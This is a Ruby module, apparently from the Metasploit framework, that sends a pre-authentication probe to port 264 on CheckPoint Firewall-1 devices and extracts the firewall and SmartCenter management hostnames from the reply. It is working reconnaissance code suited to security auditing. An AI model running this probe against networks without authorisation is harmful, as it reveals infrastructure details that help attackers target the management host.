GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/checkpoint_hostname.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
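class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  # The 4-byte reply this module treats as "the peer is a CheckPoint
  # Firewall-1 endpoint"; anything else is reported as unexpected.
  EXPECTED_REPLY = "Y\x00\x00\x00".freeze

  # Extracts the two names from the topology reply. Per the module
  # description this is the CheckPoint Internal CA CN string; the first
  # capture is the firewall host, the second the SmartCenter host, which is
  # the order report_info expects.
  HOSTNAME_PATTERN = /CN=(?<fw_host>.+),O=(?<sc_host>.+)\./i

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
        'Description' => %q{
          This module sends a query to the port 264/TCP on CheckPoint Firewall-1
          firewalls to obtain the firewall name and management station
          (such as SmartCenter) name via a pre-authentication request. The string
          returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
          host. Whilst considered "public" information, the majority of installations
          use detailed hostnames which may aid an attacker in focusing on compromising
          the SmartCenter host, or useful for government, intelligence and military
          networks where the hostname reveals the physical location and rack number
          of the device, which may be unintentionally published to the world.
        },
        'Author' => [ 'aushack' ],
        'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
        'References' => [
          # aushack - None? Stumbled across, probably an old bug/feature but unsure.
          [ 'URL', 'https://web.archive.org/web/20120508142715/http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],
          [ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]
        ],
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(264),
      ]
    )
  end

  # Returns false so the framework's automatic module selection skips this
  # module; it has to be run explicitly against a chosen RHOST.
  def autofilter
    false
  end

  # Connects to RHOST:RPORT, sends the two probes and, when the peer answers
  # with EXPECTED_REPLY, requests the "securemote" topology and parses the
  # hostnames out of it. Whatever happens after connect, the socket is
  # released in the ensure block rather than only on the success path.
  def run
    print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
    fw_hostname = nil
    sc_hostname = nil

    connect
    begin
      sock.put("\x51\x00\x00\x00")
      sock.put("\x00\x00\x00\x21")
      res = sock.get_once(4)

      if res == EXPECTED_REPLY
        print_good("Appears to be a CheckPoint Firewall...")
        sock.put("\x00\x00\x00\x0bsecuremote\x00")
        fw_hostname, sc_hostname = parse_hostnames(sock.get_once)
        if fw_hostname
          print_good("Firewall Host: #{fw_hostname}")
          print_good("SmartCenter Host: #{sc_hostname}")
        end
      else
        # res may be nil when get_once returned nothing; inspect renders that
        # as 'nil' instead of raising.
        print_error("Unexpected response: '#{res.inspect}'")
      end

      report_info(fw_hostname, sc_hostname)
    ensure
      disconnect
    end
  end

  # Only trust that it's real if we have a hostname. If you get a funny
  # response, it might not be what we think it is.
  #
  # Records a host entry (with the firewall name and, when present, the
  # SmartCenter name in :info) and a service entry for the probed port. Both
  # names come straight from the remote peer and are stored verbatim.
  #
  # @param fw_hostname [String, nil] firewall host parsed from the reply
  # @param sc_hostname [String, nil] SmartCenter host parsed from the reply
  def report_info(fw_hostname, sc_hostname)
    return unless fw_hostname

    host_info = {
      host: datastore['RHOST'],
      os_name: 'Checkpoint Firewall-1',
      purpose: 'firewall',
      name: fw_hostname
    }
    host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
    report_host(host_info)

    report_service(
      host: datastore['RHOST'],
      port: datastore['RPORT'],
      proto: 'tcp',
      name: 'securemote'
    )
  end

  private

  # Splits a topology reply into [firewall_hostname, smartcenter_hostname].
  # Returns [nil, nil] when the reply is nil or does not match
  # HOSTNAME_PATTERN, so callers can test the first element alone.
  #
  # @param res [String, nil] raw bytes read from the socket
  # @return [Array(String, String), Array(nil, nil)]
  def parse_hostnames(res)
    match = res && res.match(HOSTNAME_PATTERN)
    return [nil, nil] unless match

    [match[:fw_host], match[:sc_host]]
  end
end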